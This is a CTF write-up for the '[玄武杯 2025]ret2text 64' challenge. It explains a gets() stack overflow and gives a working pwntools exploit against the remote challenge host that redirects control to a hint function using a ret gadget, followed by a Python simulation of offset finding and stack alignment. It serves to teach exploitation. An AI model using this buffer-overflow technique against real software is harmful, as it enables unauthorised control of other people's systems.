Attack principle

Example

[玄武杯 2025]ret2text 64

https://www.nssctf.cn/problem/7304
checksec:

```
[*] '/home/huayi/Desktop/pwnexp/blog_ctf/ret2text/[玄武杯 2025]ret2text 64/ret2text1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

This is the simplest form of ret2text. The goal is to hijack control flow into the hint function; the bug is a stack overflow in func, where gets reads input with no length limit. The protections line up for it: no canary, so the overflow reaches the saved return address untouched; No PIE, so the address of hint is fixed at 0x400000-based load and can be read straight from the symbol table; NX does not matter because we never execute injected code, only existing code in the binary. The extra `ret` gadget in the chain is for stack alignment: the SysV ABI expects rsp % 16 == 8 on function entry, a plain return to hint would leave rsp % 16 == 0, and libc routines that use SSE instructions (movaps in system, for example) fault on a misaligned stack. One `ret` pops 8 more bytes and restores the expected alignment.

```c
int func()
{
    char v1[48]; // [rsp+0h] [rbp-30h] BYREF   <- buffer at rbp-0x30

    puts("Please enter your name");
    gets(v1);                     // no length check: input past 0x30 bytes overwrites saved rbp, then the return address
    printf("OK,%s,Nice to meet you!", v1);
    puts("Let's chat next time.");
    return puts("Bye!!!");
}
```

exp:

```python
from pwn import *
import sys

context.terminal = ['tmux', 'sp', '-h']
context.update(log_level='debug', os='linux', arch='amd64')

# "python exp.py r" attacks the remote instance, anything else runs the local binary
if len(sys.argv) > 1 and sys.argv[1] == "r":
    io = remote('node1.anna.nssctf.cn', 28319)
else:
    io = process('./ret2text1')

elf = ELF('./ret2text1')

# A bare `ret` gadget in the binary (No PIE, so the address is fixed). It is only there
# to keep rsp 16-byte aligned when hint() starts executing.
ret_addr = 0x000000000040101a
# No PIE: the symbol address in the ELF is the runtime address.
hint_addr = elf.symbols['hint']
success(f"hint addr = {hex(hint_addr)}")

io.recvuntil(b'Please enter your name\n')
# v1 sits at rbp-0x30: 0x30 bytes of buffer + 8 bytes of saved rbp, then the return address.
# Layout: filler (0x38) | ret gadget | hint address
payload = b'A' * (0x30 + 0x8) + p64(ret_addr) + p64(hint_addr)
io.sendline(payload)  # gets() stops at the newline, so sendline is fine here

io.interactive()
```
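To make the offset and the alignment argument concrete without the binary, here is an added example (not the post's exploit and not pwntools): a pure-Python model of func()'s frame built from the decompilation above (v1 at rbp-0x30, then saved rbp, then the return address), a de Bruijn cyclic pattern and lookup of the kind used to measure the overflow offset from a crash, the payload builder, and a check of rsp mod 16 at the target's entry that shows why one `ret` gadget is needed. ORIG_RBP, ORIG_RET and the HINT placeholder are constructed values, not addresses from the challenge binary; 0x40101a is the ret gadget the post uses.

```python
import itertools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield a de Bruijn sequence B(k, n): every n-byte window occurs exactly once,
    so the bytes found on the stack after a crash identify their offset (same idea as
    pwntools' cyclic())."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(subseq, n=4, max_len=0x1000):
    """Offset of the first n bytes of `subseq` inside the pattern, or -1."""
    return cyclic(max_len, n).find(bytes(subseq[:n]))


# Frame layout of func() from the decompilation: v1 is at rbp-0x30.
BUF_SIZE = 0x30
SAVED_RBP = 8
RET_SLOT = BUF_SIZE + SAVED_RBP   # 0x38: offset of the saved return address

# Constructed stand-ins for the real frame contents (hypothetical values).
ORIG_RBP = 0x7FFCDEAD0000
ORIG_RET = 0x401300


def p64(x):
    return struct.pack("<Q", x)


def simulate_gets(user_input):
    """Model gets(v1): an unbounded copy into [v1][saved rbp][return address].
    Returns the frame bytes after the copy; it grows past the real frame if the input is longer."""
    frame = bytearray(b"\x00" * BUF_SIZE + p64(ORIG_RBP) + p64(ORIG_RET))
    frame[:len(user_input)] = user_input   # gets() never checks the length
    return bytes(frame)


def return_address_after(user_input):
    return simulate_gets(user_input)[RET_SLOT:RET_SLOT + 8]


def find_offset():
    """The gdb workflow: send a pattern, crash, read the 8 bytes at $rsp, look them up."""
    crashed = return_address_after(cyclic(200))
    return cyclic_find(crashed)


def build_payload(offset, ret_gadget, target):
    """offset bytes of filler (covers v1 and the saved rbp) | ret gadget | target address."""
    return b"A" * offset + p64(ret_gadget) + p64(target)


def rsp_mod16_at_target_entry(num_ret_gadgets):
    """rsp mod 16 when the hijacked target starts running.
    At func's entry rsp % 16 == 8 (call pushed 8 bytes onto a 16-aligned stack); after
    `push rbp` rbp is 16-aligned, so the saved rip at rbp+8 is at an address that is 8 mod 16.
    func's own ret leaves rsp = slot + 8, and every extra `ret` gadget pops 8 more."""
    ret_slot_addr_mod16 = 8
    return (ret_slot_addr_mod16 + 8 * (1 + num_ret_gadgets)) % 16


def stack_aligned_for_target(num_ret_gadgets):
    """True when the target sees the ABI-expected rsp % 16 == 8 at entry."""
    return rsp_mod16_at_target_entry(num_ret_gadgets) == 8


if __name__ == "__main__":
    RET_GADGET = 0x40101A   # the ret gadget used in the post
    HINT = 0x401234         # placeholder for elf.symbols['hint'], not the real address
    off = find_offset()
    frame = simulate_gets(build_payload(off, RET_GADGET, HINT))
    print(f"offset={hex(off)} ret slot={frame[RET_SLOT:RET_SLOT + 8].hex()} "
          f"aligned with 0 rets={stack_aligned_for_target(0)} with 1 ret={stack_aligned_for_target(1)}")
```

The offset comes out as 0x38 = 0x30 + 8, matching `b'A'*(0x30+0x8)` in the exploit, and the alignment check is the reason the chain is `ret; hint` rather than `hint` alone: with no gadget the target starts with rsp % 16 == 0, with one gadget it gets the 8 the ABI promises.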

Approach summary